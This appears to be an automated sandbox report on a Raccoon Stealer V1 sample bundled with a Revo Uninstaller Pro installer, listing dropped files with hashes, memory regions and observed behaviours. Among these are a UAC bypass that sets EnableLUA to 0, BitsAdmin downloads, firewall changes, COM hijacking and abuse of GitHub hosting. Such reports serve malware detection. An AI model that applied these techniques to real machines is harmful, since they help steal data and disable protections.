| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/4312-131-0x0000000005FB0000-0x0000000006304000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6bff6adce2a7cc1a2f331061641c82f3 |
| SHA1 | 80cc8d381b16b0ea86894252fffefcc206b403ce |
| SHA256 | a02ca11204d69c3430a630540209bd89886b8106614bfaac0eb0e1dc8e6a7f9f |
| SHA512 | e3652c9cb68566c281d62e78a6494a215349c41a58d01ac0c4f1e909af3ce07f1c57bc2834e3d2ad584a1fbecdbdeb81fab4d7ff80c91b98920d219ca87e77ef |
memory/4312-133-0x0000000006970000-0x00000000069BC000-memory.dmp
memory/4312-134-0x000000006F700000-0x000000006F74C000-memory.dmp
memory/4312-144-0x00000000077B0000-0x0000000007853000-memory.dmp
memory/4312-145-0x0000000007A60000-0x0000000007A71000-memory.dmp
memory/3948-146-0x0000000000400000-0x0000000000429000-memory.dmp
memory/4692-150-0x0000000005830000-0x0000000005B84000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 73909591451d3d1f7c6e353a52ce7afa |
| SHA1 | f7f0badcda6bbe4666233728e4fc57e2061ff911 |
| SHA256 | 938ed00289d478f6234221da4c836e4ed5b281d75f28aa27e737ca92d98e0a24 |
| SHA512 | 3b292f129ffac3333897ddbc488b5ce84a31095b1c6ae9736ef21bfd359ea51c5da99ccd7af62395133a5abfb273ed43cfb92c48857b6865b24a1f27ef52ceec |
memory/3340-159-0x0000000000400000-0x0000000000509000-memory.dmp
memory/3340-162-0x0000000007390000-0x000000000739F000-memory.dmp
memory/3340-160-0x00000000748B0000-0x00000000748CB000-memory.dmp
memory/3340-161-0x0000000075660000-0x0000000075671000-memory.dmp
memory/4692-163-0x000000006F6E0000-0x000000006F72C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 759d93b25e23ab1faa35f2e13b3adb9e |
| SHA1 | 325cee68c2765b166c648374b6ad6e07080ec03c |
| SHA256 | 46da386d4198c126a60b8c3b293c674ce8b844c7b0893a6956638947a9797e32 |
| SHA512 | 89090bc8dff1a9ddfae2cf37eab5d72ba6f88c2ea5241932cba550c6d024604726d49eceda2aa833f84d2220866102224e8f0af241f47a04604a936faa5f2899 |
memory/636-184-0x0000000006BC0000-0x0000000006BE2000-memory.dmp
memory/636-185-0x0000000007F50000-0x00000000084F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 16e084bc764dbfb34c262d32abb743e6 |
| SHA1 | 1ce50039217fca8441984a5f79ebf4db9da5354d |
| SHA256 | a3c01d310fd888da1f2ceccfe4bbedd2d139bd66da10cb68914f0fc4153ad599 |
| SHA512 | ff67806345700e42bb205cd471011cd7b88f2aff01bba27eea6c4062c6cde059f3a6b8d8d9c94ccc51bc5cd91d4aea24d7d832f5d186d37c869f215483987b02 |
memory/1200-197-0x000000006F6E0000-0x000000006F72C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6190fc29490068464249b428f75047d6 |
| SHA1 | e5f555b2985167e13f61907cf9a00a78a0c7dd76 |
| SHA256 | 3cde051d26ea7c7073a3e73c0e903cd5aa60b8e502573e8e0c7391effb6588bc |
| SHA512 | 81d0999325fdd3ee61044abf7698a45ba6d6fb00e9474fdd30c08d3414063d62bbdb3c620e722db7e613200378380c49218a8d52b040386372aaab4f311e0ab4 |
memory/3856-218-0x000000006F6E0000-0x000000006F72C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 46057eda4d28b17e51e7e708dd570c9a |
| SHA1 | 6a5d6a620dd326ccc6c6f4759118de9b4b90ce74 |
| SHA256 | 0c94c7500f261fe14483f1c927f08e26980c1e5dd0bf83e866cdda1c8a7adcf3 |
| SHA512 | 99f4ce7532a5ac71e47de3e43457db1a23227153eea7188d0ec7c4f853b8132ee5ba5828d4fffed040709722f532f19992f4fdbb8261df58c6e9f85fc89beb27 |
memory/964-239-0x000000006F6E0000-0x000000006F72C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e76c39db445edb5e1a4d1ec43e5567d0 |
| SHA1 | be398199fa043840a69b17fe545b9b4ca8dc35ab |
| SHA256 | 5ea7746b6096f671aae5f55739cacfb28fee391cc4ef2d8774b2e1d3398c06c6 |
| SHA512 | fe3a17fcdfe275d3cbd44d3afea97034c17f3fd88d7c2247b4369fe9b24372e9f1dbc732f4cb6b0196eef5aca0f55b8b5076f0f0d81f1c976981ff2ab5feccf8 |
memory/1136-260-0x000000006F6E0000-0x000000006F72C000-memory.dmp
memory/3340-262-0x0000000000400000-0x0000000000509000-memory.dmp
memory/2932-285-0x0000000005E60000-0x00000000061B4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1c7a7ac4d02de7177598e568cd1cf811 |
| SHA1 | a72c865aca9bb5034cb5b9f56101cb330653c61d |
| SHA256 | d3bf5a804a6d2d95837e77f97201cbaec19bb44672d1da9e6e20f29cb2b30d7e |
| SHA512 | 4f50baff10680af724e45f69e448cec786dbea3d9c4c2f0f99bf6250f967de6bbd181a775e4280261505b7b0a03f97498065533314d23fbdd59064b8037225df |
memory/2932-287-0x000000006F700000-0x000000006F74C000-memory.dmp
memory/2932-388-0x0000000007AA0000-0x0000000007AB4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 69e8bd332cc3ba76ca61bed2edc9759b |
| SHA1 | a1c669b40ec3b1d77c1d8c553a052180d56cbc0b |
| SHA256 | e9bf7274c49093fe06b4e6d46157f147810ab5906672c0c7bed5d3034fdc2e3a |
| SHA512 | 17d29612420080a16c6e4d59e8220eec106e308dfa4262c8835ba3cd9f47cd2c1a2538292568767a33a8917ea84029ca9c87a6167b858c19bc10b3a0b05bff72 |
memory/1520-408-0x000000006F6E0000-0x000000006F72C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b05f5ec99e746efdb7dd9751579575d4 |
| SHA1 | 07a3d6e33e7eb86404ed4b87ee7ad09899689e14 |
| SHA256 | a74004fe2aa75c4eee13fae7f6fc18ae9904239b214a3eac6779b6d6513d2488 |
| SHA512 | fd370f79dedcbd5f321bd87d273d2b098f94b243bff75adee6805495f16222ca54c4ba2bc39abb1618d1a2c87b162340b395dfc3b4dd39eeadd4425d407635c0 |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
| MD5 | ddb041550a3e69764cd9d7d3de3636f3 |
| SHA1 | 1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c |
| SHA256 | 54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975 |
| SHA512 | 00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800 |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
| MD5 | edc78deb34de240c787b1011161e9a4e |
| SHA1 | 2d31275530dce33d3bc329991c8ad59e1b303577 |
| SHA256 | 69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b |
| SHA512 | e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b |
memory/2012-456-0x000000006F6E0000-0x000000006F72C000-memory.dmp
memory/2012-466-0x00000000079D0000-0x0000000007A73000-memory.dmp
C:\Windows\System32\drivers\revoflt.sys
| MD5 | 498c3d4d44382a96812a0e0ff28d575b |
| SHA1 | c34586b789ca5fe4336ab23ad6ff6eeb991c9612 |
| SHA256 | 23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba |
| SHA512 | ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1 |
memory/2012-471-0x0000000007E60000-0x0000000007E71000-memory.dmp
memory/2012-472-0x0000000007EA0000-0x0000000007EB4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c5a13c0d8b66ec62c774da9617d8b1fb |
| SHA1 | 17b1c8c5e9b29afe680c0675aac15712111ccc7a |
| SHA256 | 00ae712813cbadc4486db634b5524db7d5f5ff9680f5b0f588c2c90d03fd3316 |
| SHA512 | b0306fb83c35661fa9996674b9657d4b5fb593313ca4d299f92bb71e5b4e3770d79e7a3f166cbbd86b0b948d19a1d41117da5ce982f6dafdbd1731f09948833a |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
| MD5 | 75d7bf3468669a6c3df6f4d048315128 |
| SHA1 | 678d3b531738573520367b47c0cd52cf5e431fa0 |
| SHA256 | 927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae |
| SHA512 | 9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e |
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
| MD5 | 1dd8459f2595e4c0603ad491590f6952 |
| SHA1 | 607efe3c74388fb1e4b19f8f7ed2520ebfc349a1 |
| SHA256 | 5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d |
| SHA512 | c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d |
memory/4072-490-0x000000006F6E0000-0x000000006F72C000-memory.dmp
memory/4072-500-0x00000000070E0000-0x0000000007183000-memory.dmp
memory/2596-501-0x0000000000400000-0x0000000000E32000-memory.dmp
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini
| MD5 | 6c9dbe894ea20eb190db6b483f17030d |
| SHA1 | 1bac02001cba8c083b987264f1bb89b05b74155f |
| SHA256 | 24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846 |
| SHA512 | b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a |
memory/4072-506-0x0000000007420000-0x0000000007431000-memory.dmp
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini
| MD5 | c37fb8c46d0281dd27768fd1101614f0 |
| SHA1 | 03e736a49687f9ac10b35cc791e7df5b7e55f4d8 |
| SHA256 | ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c |
| SHA512 | b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776 |
memory/3340-511-0x00000000748B0000-0x00000000748CB000-memory.dmp
memory/3340-510-0x0000000000400000-0x0000000000509000-memory.dmp
memory/4072-516-0x0000000007460000-0x0000000007474000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f4dd70c385c79cc5ebda9fe89100f210 |
| SHA1 | 39b66e96adf422d6ce14416b291a8104a779261c |
| SHA256 | 1753d46a9bc3658056b8aa36a8a26cf7101dca212507a4f07cacca013afc9759 |
| SHA512 | 64050203a854fe2fd366e1a81ecbe18e7da1eba98b44412fa4f369a51faa648f466ae510d872877d428d585e47082baf479d235b8d0d595e67176a2bdf69ab40 |
memory/2880-528-0x000000006F6E0000-0x000000006F72C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4121c28f824fbc2d46c627f886c635da |
| SHA1 | 5137783aa9254147be2500b3f325e48fe700399d |
| SHA256 | 3e642f6f08a38ca17830880b2e11441b5dfa0ca1933ffcad96a1011f2c2c3777 |
| SHA512 | 12351b348a1e4d86da96036a280c62917e6297e88faddb145b8176f0afd31b36667675db2c928729977c50645107d0ec6406ac3b09689a85c8ae6b1e6db4b288 |
memory/3340-562-0x0000000000400000-0x0000000000509000-memory.dmp
memory/3948-563-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3464-565-0x000000006F6E0000-0x000000006F72C000-memory.dmp
memory/3464-575-0x0000000007050000-0x00000000070F3000-memory.dmp
memory/3464-576-0x0000000007300000-0x0000000007311000-memory.dmp
C:\ProgramData\VS Revo Group\Revo Uninstaller Pro\revouninstallerpro4.lic
| MD5 | 8462a9b69c76a9603a4143d51fbc201e |
| SHA1 | 4473590f93f94f22c340a354516191c3c0ba6532 |
| SHA256 | fe4bcb4251f77375119a936c80fb36221af0c5105e840e2e115d47f96cb437c8 |
| SHA512 | 2f02ecdb06760a093f4d8e6f04c97138695b064db8cb2dcc4af9b47c829852f38b77be9425eb2f3e3e36f85da181c116c829921fa35ae68afc57c728d5393570 |
memory/3464-578-0x0000000007350000-0x0000000007364000-memory.dmp
memory/1184-580-0x0000000000400000-0x0000000000E32000-memory.dmp
memory/3996-581-0x0000000005970000-0x0000000005CC4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3bf3cf2a1f9dfa39053a2e52efd53d4c |
| SHA1 | efe9fa8ceae3f0f9b8d2d5c6eed17b78ccfd6ed9 |
| SHA256 | 5a9671e65d4f22e2b592c14b6b18c08a88579363fc34dd0a7af952fa515287c1 |
| SHA512 | 9ed2515f428ac04f30098038dc73bb9f6eab5cb222408990652ccb4ba6c77fb05223dc6c01b200033279d043838562d05b4c6511975d878f57112c723107022e |
C:\Users\Admin\AppData\Local\VS Revo Group\Revo Uninstaller Pro\data\cachedata.dat
| MD5 | d1d1e40ea4d3ed2a8d5def030a67e025 |
| SHA1 | 0ec1c6fd519d9cd0d89b0b0d86b8b74c356fbe3c |
| SHA256 | 42d33b63bce3350ade857c571d281e013c2b2b28d42f7ddf509d57c596ef0088 |
| SHA512 | 94c27ba0d16e653a25c8e1c488a1d35a020b4b932d4c8953a0ecce6ceba5c153718a4eb46cbfca3169a008c0387b16f6b02d8806d4711d9d6bb3ad015ee8bd32 |
memory/3996-596-0x0000000006580000-0x00000000065CC000-memory.dmp
memory/3996-598-0x00000000747B0000-0x00000000747FC000-memory.dmp
memory/3996-608-0x0000000007290000-0x0000000007333000-memory.dmp
memory/3996-609-0x0000000007540000-0x0000000007551000-memory.dmp
memory/3996-610-0x0000000007580000-0x0000000007594000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e981a9b06aab254a64a5c2b07ee4c188 |
| SHA1 | e87ef6195e019ea175c3be781597a2972abab9d2 |
| SHA256 | 82ba303d4ad497e690525fd2bb40ceafea797dc73fdee4820df6860f711c392c |
| SHA512 | d0aca64c2f61cb941103cd1fbf1d4732b9135f9657c601210bb413b9c7286b4d1a253bfbd277c066500a365111367ade6b830ae0d4e7e7721efa98e5b7c65ecb |
memory/4692-622-0x00000000747B0000-0x00000000747FC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0dd66ce57443547d10c5f39ea090cf9d |
| SHA1 | 9c3c27cf8c3a8b4d6dc6666e746a0b65df4ed270 |
| SHA256 | b4fe650da01824398666a7dbe6bc862f1580369035a274b1ed6e0842d9d82054 |
| SHA512 | f552d53bb3e0d56da03a4965a7646a9b02ba9625411058cd67e20e62d9a4ef5ce9492f82e365e79de768e5ebedc5b565c34943efb03a10726ef5108ad69bc356 |
C:\ProgramData\uzlyLtM20yixSdV\main.bat
| MD5 | 1376349b5831fe5760106870cd5bad6d |
| SHA1 | cf6ff2d17e597893a61fedfd4fe90748ab2349e1 |
| SHA256 | 67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872 |
| SHA512 | 64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8 |
C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat
| MD5 | 308ba58a50ffa9eabd31fdba79af6dd1 |
| SHA1 | 29c09164facb6419f9d7f9e103f7e13bed4743a1 |
| SHA256 | 0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243 |
| SHA512 | 674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f |
C:\ProgramData\uzlyLtM20yixSdV\file.bin
| MD5 | 3ba604f3bc038fae6d7d70df18a95e8d |
| SHA1 | f8553490c0063dba7d0e69b9e688d9abfec98314 |
| SHA256 | 5077f9091c91a13eb822227b0a4e9a2f277542eec22910f794a44606fea16af5 |
| SHA512 | 3144a0fb0ffc02e2cf35bffad36b42a76c6f7edd3089eeac884bb742278a68245143da981d54b9e0c026778bdf9ca38d19ea69c09e206e86defbd17427d1f642 |
C:\ProgramData\uzlyLtM20yixSdV\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\ProgramData\uzlyLtM20yixSdV\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\ProgramData\uzlyLtM20yixSdV\extracted\file_2.zip
| MD5 | b935bb028c9e072364d33b5e482b93c9 |
| SHA1 | 63a89514cfd0a64fc7a1fbcd5bd91f0c350a212b |
| SHA256 | 5d55c036145879b4e92a9bd1862ff15c83954469bf96ce7cc8afbd6229d21845 |
| SHA512 | a41c488f634d117dcee8aaf5de8bbf9463ae39be1b85aa12355cbec9f275085c44c3ed654e214fbbde8a51c260627c105b1902aebb66e0129f3c11d699de53bc |
C:\ProgramData\uzlyLtM20yixSdV\extracted\file_1.zip
| MD5 | c28ab5e6ae8588e03b92c24b14d12fef |
| SHA1 | 801c88fb58288fa2d54cf7584a089d6c50c02bb8 |
| SHA256 | ec59673a06768a14aed715995de14d34af211af5a4534059b5e22ab314a447a2 |
| SHA512 | a3f51f254166caba5664d5aca331142d481a60c803de8d69d5d278b1c74bcf2b312b07fd1e46e380ff3954f4e104674081fe3ceaa782b178adfab9226fe83442 |
C:\ProgramData\uzlyLtM20yixSdV\extracted\111.exe
| MD5 | 618155a1c0479bc80c4bd28b7af93162 |
| SHA1 | 542bf77b03bbdc5cc5caf0582b39cdc185e686f6 |
| SHA256 | ea712e9759d73168f605f8a55771d4aef62b0bef4b45cb8fd68ed11ea11c2fb4 |
| SHA512 | b870452ce96985e431789c2497f4fa46194ce1bf56463e1dc99b98513236b8b01228ec08c734a6c6af739ee00cb715a6cd8a62382febab4678a1055c34d5a461 |
C:\ProgramData\uzlyLtM20yixSdV\extracted\ANTIAV~1.DAT
| MD5 | 3b9f43ca28acf55c64c9aa1ceb46c2d7 |
| SHA1 | 7e30f2fde7a55b2023b03231993d66ea48513083 |
| SHA256 | ef08bdd7b11c188b1c0d0138dc9030fd3a2923512f983623bbdd34e55d95e50f |
| SHA512 | 58dece7172478fc948020de1dd67939331f0db1191b2583fa421406ba8d5d5a1907e2989447813ca1f0fdc0b9248e8bdb31db241f78e2b3f12d64f5c49f7d0a2 |
memory/4612-670-0x00000000008A0000-0x00000000009CE000-memory.dmp
memory/4612-671-0x0000000005280000-0x0000000005312000-memory.dmp
memory/4612-672-0x00000000053C0000-0x000000000545C000-memory.dmp
memory/4612-673-0x0000000005360000-0x000000000536A000-memory.dmp
memory/4612-674-0x0000000005800000-0x000000000581A000-memory.dmp
memory/4612-675-0x0000000007060000-0x0000000007150000-memory.dmp
memory/4612-676-0x0000000009740000-0x00000000097D8000-memory.dmp
memory/2752-679-0x0000000000400000-0x0000000000495000-memory.dmp
memory/2752-681-0x0000000000400000-0x0000000000495000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-02 14:53
Reported
2024-10-02 14:55
Platform
win7-20240903-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\DRIVERS\SET2839.tmp | C:\Windows\system32\rundll32.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET2839.tmp | C:\Windows\system32\rundll32.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\revoflt.sys | C:\Windows\system32\rundll32.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\International\Geo\Nation | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| N/A | N/A | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| N/A | N/A | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | N/A |
| N/A | N/A | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
| N/A | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\rundll32.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2228 set thread context of 2988 | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | C:\ProgramData\uzlyLtM20yixSdV\111.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-R3G4K.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CCP1.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P42QS.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-EPSJK.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P16HQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8J9A4.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-LM2NR.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-H28K7.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SABMQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-9JREG.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-O1JAE.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5JKK.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1FKA5.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
| File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DJPHA.tmp | C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A |
